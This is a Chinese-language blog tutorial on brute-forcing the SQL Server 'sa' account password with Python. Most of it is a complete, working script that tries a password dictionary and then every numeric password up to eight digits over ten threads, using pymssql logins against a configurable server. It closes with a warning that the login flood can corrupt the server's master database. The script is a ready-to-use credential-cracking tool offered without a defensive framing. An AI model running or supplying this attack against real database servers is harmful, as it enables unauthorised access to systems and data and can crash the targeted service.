利用python破解sqlserver账号密码

---

一、编写密码测试函数

---

在用python连接mssql数据库的时候，通常会使用pymssql模板中的connect函数，格式如下：

connect(server,user,password,database)

help文档的函数介绍：

　　connect(...)
　　Constructor for creating a connection to the database. Returns a
　　Connection object.

正常情况下，如果输入正确的server，user，password和database参数，该函数会返回一个数据库连接对象，而输入的参数是错误的信息时，则会报错，并返回各种错误提示。

所以倘若使用循环语句，将所有可能的密码字符串传递给connect函数，并配合try...except...就可以达到破解mssql一个指定账号的密码的目的了。

 def cracker(server,pswd_list):
     for pswd in pswd_list:
         try:
         　　conn=pymssql.connect(server,'sa',str(pswd),database='master')
         　　print(u"服务器%s 账号sa的密码为 ：  %s\n" % (server,pswd))
         　　conn.close()
         　　break
         except:
         　　continue

如上代码：server为mssql服务器的地址，pswd_list为密码字符串列表。

---

二、生成密码列表

---

遍历所有可能的密码，既不现实也太花时间。

所以这里考虑的方案是

• 1、首先基于密码字典进行破解

先尝试网络上流行使用的各类常用和简单的密码。

 def get_pwlist():
     pwlist = []
     with open('passwddic.txt','r') as f:
         for line in f.readlines():
             password = line.strip('\n')
             pwlist.append(password)
     return pwlist

• 2、在密码字典没有匹配到正确密码的情况下，尝试从1位到8位，遍历所有的数字组合。

一个简单的方案就是使用range(1,100000000)，将1到100000000间所有的数值作为密码就行尝试。

---

三、开启多线程

---

虽然目前缩小的密码样本空间，但是通过循环遍历这些密码还是要花费太多的时间。

所以这里需要利用模板threading使用多线程同时测试这些密码，大幅缩减遍历所有密码所需时间。这里需要解决两个问题：一方面，我们需要把密码列表根据分配的线程数平分给各个线程。另一方面，需要设置一个变量tag，初始设置成False，当一个线程找到正确密码的时候将该变量更改为True，这样其他的线程就可以根据这个变量提前结束运行，不再做不必要的测试。

全部的代码如下：

 #!/usr/bin/evn python
 #-*- coding:utf-8 -*-
 '''
 Created on 2018年11月19日

 @author: jinfeng
 '''

 from threading import Thread
 import time
 import os
 import pymssql

 def cracker(server,pswd_list,no):
     global tag

     print(u"No.%s号线程已开始运行，对%d个常用密码进行测试 !" % (no,len(pswd_list)))
     for pswd in pswd_list:
         if not tag:
             try:
                 conn=pymssql.connect(server,'sa',str(pswd),database='master')
                 print(u"No.%s号线程运行结束 !\n 服务器%s 账号sa的密码为 ：  %s\n" % (no,server,pswd))
                 tag = True
                 conn.close()
                 break
             except:
                 continue
         else:
             break

     #print(u"No.%s号线程运行结束 !" % no)

 def get_pwlist():
     pwlist = []
     with open('passwddic.txt','r') as f:
         for line in f.readlines():
             password = line.strip('\n')
             pwlist.append(password)
     return pwlist

 def main():
     global tag
     tag = False
     server = '127.0.0.1'
     num_thread = 10
     time_start = time.time()
     pwlist = get_pwlist()
     step = len(pwlist)//num_thread+1
     for n in range(num_thread):
         t1 = Thread(target = cracker,args = (server,pwlist[step*n:step*n+step],str(n+1),))
         t1.start()
     t1.join()

     if not tag:
         print(u'密码字典测试完毕，未找到匹配密码，将遍历测试8位以内所有数字密码！')
         for m in range(10):
             t2 = Thread(target = cracker,args = (server,range(m*10000000,(m+1)*10000000),str(m+1)+'+',))
             t2.start()
         t2.join()
     time_end = time.time()
     time_use = time_end - time_start
     print(u'用时 %d时%d分%d秒' % (time_use//3600,time_use%3600//60,time_use%60))

 if __name__ == "__main__":
     main()

运行结果如下：

 警告：高密度频繁访问mssql的数据库，有可能让数据库的主服务崩溃（master数据库文件损坏），所以最好提前备份好数据库中的系统数据库（先停止mssql主服务，备份master.mdf和mastlog.ldf两个文件）。系统数据库崩溃后，如下图，错误代码3417。否则只就能从其他地方复制master.mdf和mastlog.ldf来替换本地损坏文件。